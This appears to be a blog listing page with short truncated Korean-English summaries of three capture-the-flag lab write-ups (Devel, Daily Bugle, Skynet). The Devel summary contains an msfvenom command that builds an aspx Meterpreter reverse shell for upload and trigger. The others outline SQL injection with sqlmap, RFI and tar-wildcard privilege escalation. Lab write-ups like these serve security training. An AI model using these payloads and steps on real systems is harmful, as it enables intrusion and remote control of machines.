Elbrown

Devel * 웹에서 venom 쉘이 실행되도록 was가 실행가능한 포멧으로 페이로드를 생성하여 업로드. Armed with the ability to upload files, it is possible to drop an aspx reverse shell on the target and execute it by browsing to the file via the web server. The following command will create the aspx file: msfvenom -p windows/meterpreter/reverse_tcp LHOST=호스트 LPORT=포트 -f aspx > devel.aspx 다음과 같이 curl을 사용하여 콘솔에서 트리거 할 수 있음 curl -g 10.10...

Daily Bugle Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum. 문제에 대한 포럼과 다른 방법의 팁들 https://tryhackme.com/thread/5e1ef29a2eda9b0f20b151fd 칼리에 joomla 스캐너 툴이 존재함 => 버전: joomscan 3.7.0 http://10.10.113.114/administrator Exploit-DB검색 searchsploit joomla 3.7.0 SQLMAP 진행 추출 순서 1. DBMS: --dbs 2. TABLE: -D joomla --tables 3. Column..

Skynet A vulnerable Terminator themed Linux machine. Scan ports using nmap Use GoBuster to enumerate directories Experiment with SMBMap to find Samba shares Using enumerated credentials to read emails Exploit CMS RFI vulnerability Exploit tar wildcards for privilege escalation Flow정리 1. Enumeration (samba) - nmap,smbmap,enum4linux 사용 2. 정보 획득 및 다운로드 - smbclient, rpcclient, smbget 사용 3. 히든 디렉토리 -..